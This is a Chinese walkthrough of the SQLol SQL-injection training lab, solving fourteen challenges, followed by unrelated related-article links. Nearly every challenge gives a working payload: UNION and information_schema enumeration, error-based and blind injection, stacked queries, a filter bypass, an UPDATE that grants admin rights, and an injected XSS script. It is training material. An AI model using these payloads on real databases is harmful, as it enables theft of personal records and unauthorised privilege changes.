SQL注入测试平台 SQLol -6.CHALLENGES挑战

简介:   SQLol上面的挑战共有14关,接下来我们一关一关来突破。   Challenge 0 目的是让查询返回所有的用户名,而不是只有一个。 SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC 注入点在【1】处 构造POC:  1' or 1=1# 或者 1' and 1=2 union select username from users# 都可以查询到所有的用户名。

  SQLol上面的挑战共有14关,接下来我们一关一关来突破。

 

Challenge 0

目的是让查询返回所有的用户名,而不是只有一个。

SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC

注入点在【1】处

构造POC:  1' or 1=1# 或者 1' and 1=2 union select username from users#

都可以查询到所有的用户名。

 

Challenge 1

目标是找到数据库中存在的社会安全号码表并提取信息。

SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC

注入点在【1】处,我们需要知道有哪些表哪些字段,才能找出所想要的信息,为此,我们使用information_schema进行查表查列。

构造POC: 

查出数据库所有的库,      ' and 1=2 UNION SELECT table_schema FROM information_schema.tables#

选择sqlol库查表,           ' and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema='sqlol'#

选择表,查列,              ' and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name='ssn'#

 选择字段,查数据,       ' UNION SELECT concat(name, 0x7e, ssn)  FROM ssn#

到此,已经得到所想要的信息。

 

Challenge 2

目标是找到数据库中存在的社会安全号码表并提取信息。

SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC

注入点在【1】处,与challenge1类似,所不同的,这是数字型注入,过滤单引号。

构造POC:

查出数据库所有的库,1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#

选择sqlol库查表,     1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=0x73716C6F6C#(0x73716C6F6C是sqlol的Hex编码)

选择表,查列,         1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#(0x73736E是ssn的Hex编码)

 选择字段,查数据,  1 and 1=2 UNION SELECT concat(name, 0x7e, ssn)  FROM ssn#

到此,已经得到所想要的信息。

 

Challenge 3

目标是找到数据库中存在的社会安全号码表并提取信息。

无提示,只输出一行,详细错误信息,查询不显示,与challenge 1类似。

构造POC:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 0,1

 

Challenge 4

 目的是找出数据库中存在的社会安全号码表,并提取其信息,无盲SQL注入技术。

提示,有详细的错误,可以使用报错注入

构造POC:

 ' and extractvalue(1, concat(0x5c,(select user())))#

' AND ExtractValue(1,concat(0x01,(select concat(name,':',ssn) from ssn limit 0,1)))#

 

Challenge 5

目标是找到数据库中存在的社会安全号码表并提取信息。

提示,使用盲注,无输入错误信息

构造POC:

得到数据库的长度: 1' or  length(database())=5#

逐字猜解ascii码: 1' or  ascii(mid(database(),1,1))=115#

慢慢猜,总会猜出来的,大致方法就这个。

 

Challenge 6

目标是创建一个新表称为“ipwntyourdb”使用堆叠的查询。

构造POC:

SELECT username FROM users WHERE username = 'Herp Derper';create table ipwntyourdb( id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC

 

Challenge 7

目标是找到数据库中存在的社会安全号码表,并从数据库中删除任何内容,以提取其信息。

提示:删除,报错,查询不显示

POC:

 DELETE FROM users WHERE username = '' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'

 

Challenge 8

目标找到数据库中存在的社会安全号码表并提取信息。

 提示:有黑名单过滤,需绕过,过滤了union,select,where,and,or,--,#等字符。

POC:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='

 

Challenge 9

目的是注入查询并导致其更新ID为3的用户”isadmin”更改为1。

UPDATE users SET isadmin = 1 WHERE id = 3

如何把这句拼接到原有注入点,并执行成功呢?

POC:

UPDATE users SET username = 'admin', isadmin = 1 WHERE id = 3#

更新ID为3的username为admin,并把isadmin改为1.

 

Challenge 10

目标是从数据库中获取社会安全号码。

提示:注入点在【1】处,SELECT 【1】 FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC 

POC:

seLect concat(name,':',ssn) from ssn#

 

Challenge 11

目标是从数据库中获取社会安全号码。

POC:

SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1))) ASC 

 

Challenge 12

目的是使用一个SQL注入漏洞执行反射跨站脚本攻击。

POC:

 1' and <script>alert(11)</script>#

SELECT username FROM users WHERE username = ' 1' and <script>alert(11)</script>#' GROUP BY username ORDER BY username ASC  

执行过程中,会报错,弹窗,然后提示如下:

SELECT username FROM users WHERE username = '1' and #' GROUP BY username ORDER BY username ASC  

JavaScript脚本已经成功在浏览器运行。

 

Challenge 13

目的是从数据库检索所有的用户名。

POC:

在没有过滤单引号的情况下:select username from users where username LIKE '2' or 1=1

过滤了单引号:

通过模糊查询的方法来盲注,

%,表示任意0个或多个字符

_,表示任意单个字符

[],表示字符括号中所列字符的一个

[^],不在这里的所列字符

 

根据页面返回是否正确得到判断。

1、得到username的一个首字符

select username from users where username LIKE 'P%' LIMIT 0,1

2、判断以P开头的首字符有几位

select username from users where username LIKE 'P__________' LIMIT 0,1

3、接着往下猜解呗。。。。

目录
相关文章
|
2月前
|
关系型数据库 MySQL 测试技术
【分享】AgileTC测试用例管理平台使用分享
AgileTC 是一个脑图样式测试用例管理平台,支持用例设计、执行与团队协作,帮助测试人员高效管理测试流程。
272 116
【分享】AgileTC测试用例管理平台使用分享
|
2月前
|
人工智能 数据可视化 测试技术
AI测试平台自动遍历:低代码也能玩转全链路测试
AI测试平台的自动遍历功能,通过低代码配置实现Web和App的自动化测试。用户只需提供入口链接或安装包及简单配置,即可自动完成页面结构识别、操作验证,并生成可视化报告,大幅提升测试效率,特别适用于高频迭代项目。
|
2月前
|
人工智能 测试技术 调度
写用例写到怀疑人生?AI 智能测试平台帮你一键生成!
霍格沃兹测试开发学社推出AI智能测试用例生成功能,结合需求文档一键生成高质量测试用例,大幅提升效率,减少重复劳动。支持自定义提示词、多文档分析与批量管理,助力测试人员高效完成测试设计,释放更多时间投入核心分析工作。平台已开放内测,欢迎体验!
|
2月前
|
人工智能 测试技术 项目管理
测试不再碎片化:AI智能体平台「项目资料套件」功能上线!
在实际项目中,需求文档分散、整理费时、测试遗漏等问题常困扰测试工作。霍格沃兹推出AI智能体测试平台全新功能——项目资料套件,可将多个关联文档打包管理,并一键生成测试用例,提升测试完整性与效率。支持套件创建、文档关联、编辑删除及用例生成,适用于复杂项目、版本迭代等场景,助力实现智能化测试协作,让测试更高效、更专业。
|
3月前
|
存储 人工智能 算法
AI测试平台实战:深入解析自动化评分和多模型对比评测
在AI技术迅猛发展的今天,测试工程师面临着如何高效评估大模型性能的全新挑战。本文将深入探讨AI测试平台中自动化评分与多模型对比评测的关键技术与实践方法,为测试工程师提供可落地的解决方案。
|
5月前
|
存储 测试技术 虚拟化
VMmark 4.0.3 - 虚拟化平台基准测试
VMmark 4.0.3 - 虚拟化平台基准测试
173 0
VMmark 4.0.3 - 虚拟化平台基准测试
|
1月前
|
人工智能 监控 供应链
51_安全性测试:提示注入与红队
在2025年,大型语言模型(LLM)已成为企业数字化转型的核心驱动力,但随之而来的安全挑战也日益严峻。数据显示,全球每月监测到超过50万次针对大语言模型的越狱攻击,这些攻击利用LLM的"黑箱"特性和自主生成能力,突破了传统安全边界。特斯拉自动驾驶系统因对抗性贴纸导致12%测试场景意外加速、加拿大航空聊天机器人误导票价信息被勒令退款、韩国初创公司因AI数据泄露被罚9.3万美元、谷歌Bard曾因错误信息导致市值缩水1000亿美元等真实案例,都凸显了LLM安全的重要性
|
2月前
|
人工智能 自然语言处理 测试技术
AI测试平台的用例管理实践:写得清晰,管得高效,执行更智能
在测试过程中,用例分散、步骤模糊、回归测试效率低等问题常困扰团队。霍格沃兹测试开发学社推出的AI测试平台,打通“用例编写—集中管理—智能执行”全流程,提升测试效率与覆盖率。平台支持标准化用例编写、统一管理操作及智能执行,助力测试团队高效协作,释放更多精力优化测试策略。目前平台已开放内测,欢迎试用体验!
|
3月前
|
存储 人工智能 文字识别
从零开始打造AI测试平台:文档解析与知识库构建详解
AI时代构建高效测试平台面临新挑战。本文聚焦AI问答系统知识库建设,重点解析文档解析关键环节,为测试工程师提供实用技术指导和测试方法论
|
3月前
|
人工智能 安全 数据可视化
安全测试平台的选型标准与搭建思路
随着企业安全需求升级,传统漏洞扫描和渗透测试已无法满足要求。构建安全测试平台(STP)成为趋势,实现漏洞扫描、权限评估、接口测试等工作的平台化运营。本文从选型标准、平台架构、模块功能等六个方面,系统讲解如何搭建企业级安全测试平台,提升安全能力。